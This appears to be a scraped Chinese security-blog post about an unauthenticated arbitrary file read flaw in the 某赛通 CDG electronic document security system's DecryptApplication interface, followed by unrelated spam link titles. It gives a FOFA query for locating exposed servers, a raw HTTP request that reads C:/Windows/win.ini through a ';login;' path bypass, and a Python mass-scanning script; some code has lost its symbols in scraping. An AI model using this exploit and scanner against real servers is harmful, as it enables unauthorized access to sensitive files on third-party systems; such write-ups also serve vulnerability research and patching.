当前位置: 首页 > news >正文

网站开发专业分析网站开发语言对比

网站开发专业分析,网站开发语言对比,文档下载网站 建设,湖南网站建设网漏洞简介 某赛通电子文档安全管理系统 DecryptApplication 接口处任意文件读取漏洞#xff0c;未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息#xff0c;导致系统处于极不安全的状态。 漏洞等级高危影响版本*漏洞类型任意文件读取影响范围1W 产品简介 …漏洞简介 某赛通电子文档安全管理系统 DecryptApplication 接口处任意文件读取漏洞未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息导致系统处于极不安全的状态。 漏洞等级高危影响版本*漏洞类型任意文件读取影响范围1W 产品简介     某赛通电子文档安全管理系统简称CDG是一款电子文档安全加密软件该系统利用驱动层透明加密技术通过对电子文档的加密保护防止内部员工泄密和外部人员非法窃取企业核心重要数据资产对电子文档进行全生命周期防护系统具有透明加密、主动加密、智能加密等多种加密方式用户可根据部门涉密程度的不同如核心部门和普通部门部署力度轻重不一的梯度式文档加密防护实现技术、管理、审计进行有机的结合在内部构建起立体化的整体信息防泄露体系使得成本、效率和安全三者达到平衡实现电子文档的数据安全。  网络测绘 FOFAbody/CDGServer3/index.jsp 漏洞复现 手动验证POC GET /CDGServer3/client/;login;/DecryptApplication?commandViewUploadFilefilePathC:///Windows/win.iniuploadFileId1fileName1ox9wcxwck7g1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q0.9,en;q0.8 Connection: close 查询C:/Windows/win.ini 文件 python扫描验证脚本 #!/usr/bin/env python3 # -*- coding: UTF-8 -*-Project 漏洞复现POC File 某赛通电子文档安全管理系统 DecryptApplication 任意文件读取漏洞.py Author 星之尘 Date 2024/3/14 17:36 脚本说明#影响范围 1W import requests from requests import Timeout from urllib3.exceptions import InsecureRequestWarningheaders {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 }def scan(url, path):if url.endswith(/):path CDGServer3/client/;login;/DecryptApplication?commandViewUploadFilefilePathC:///Windows/win.iniuploadFileId1fileName1ox9wcxwck7g1else:path /CDGServer3/client/;login;/DecryptApplication?commandViewUploadFilefilePathC:///Windows/win.iniuploadFileId1fileName1ox9wcxwck7g1if not url.startswith(http://) and not url.startswith(https://):url1 http:// urlurl2 https:// urlencodetext1 url1 pathencodetext2 url2 pathprint(f扫描目标: {url1})print(---------------------------------------------------)flag1 0flag2 0try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)req1 requests.get(encodetext1, headersheaders, verifyFalse, timeout20)if req1.status_code 200 and [fonts] in req1.text:flag1 1req2 requests.get(encodetext2, headersheaders, verifyFalse, timeout20)if req2.status_code 200 and [fonts] in req2.text:flag2 1if flag1 or flag2:print(f[] {url} 存在某赛通电子文档安全管理系统 DecryptApplication 任意文件读取漏洞;)else:print(f[-] {url} 不存在某赛通电子文档安全管理系统 DecryptApplication 任意文件读取漏洞)except Timeout:print(f[!] 请求超时跳过URL: {url})except Exception as e:if HTTPSConnectionPool in str(e) or Burp Suite Professional in str(e):print(f[-] {url} 证书校验错误或者证书被拒绝)else:print(str(e))if __name__ __main__:# 在这里输入扫描目标urlurl path /CDGServer3/client/;login;/DecryptApplication?commandViewUploadFilefilePathC:///Windows/win.iniuploadFileId1fileName1ox9wcxwck7g1scan(url, path)
http://www.hkea.cn/news/14279654/

相关文章:

  • 传奇手机版网站制作网站背景怎么做
  • 网站架构师招聘第三方公司做网站价格
  • 网站制作计划书很小众却很惊艳的公众号名字
  • 我做网站价格百度推广退款投诉
  • 国外哪个网站做c 挣钱邯郸网站建设网站开发
  • 网站推广对企业的优势公众号开发专业
  • 吴江做企业网站西昌市规划建设局网站
  • 响应式网站茶叶网站wordpress加速cdn
  • 深圳给企业做网站潍坊做网站优化
  • 鞋子的网站策划方案模板设计类网站策划案
  • 单位网站建设意见表格制作软件app
  • 陵县网站建设免费自建商城网站
  • 太原在线网站制作专题研究网站建设工作动态
  • 陕西省城乡和住房建设厅网站佛山市seo推广营销工具
  • asp网站建设 win7小说网站开发环境那个号
  • 一个公司可以做几个网站吗阿里备案网站
  • 网站好坏淄博网站制作平台形象
  • 惠州网站建设技术支持网站开发安全问题
  • 简历模板做的最好的是哪个网站莱芜都市人才网
  • 企业网站建设的重要性和必要性手机主页网站哪个好用
  • 网站建设拍金手指谷哥12河南省建设厅注册中心网站
  • 学校申请建设网站的原因自己开发app挣钱吗
  • 海口手机网站建设wordpress接入qq互联
  • 翻译网站建设方案奥维网络高端网站建设公司
  • 网站新媒体建设潍坊网站设计公司
  • 正规网站建设网站制作小红书3000粉丝推广报价多少
  • 网页版微信二维码失效了怎么恢复仓山区seo引擎优化软件
  • 空间做网站贵州网站建设seo优化
  • 网站制作公司咨询网站首页index.php全屏展示代码怎么弄
  • 微信朋友圈做网站推广赚钱吗搜索引擎推广特点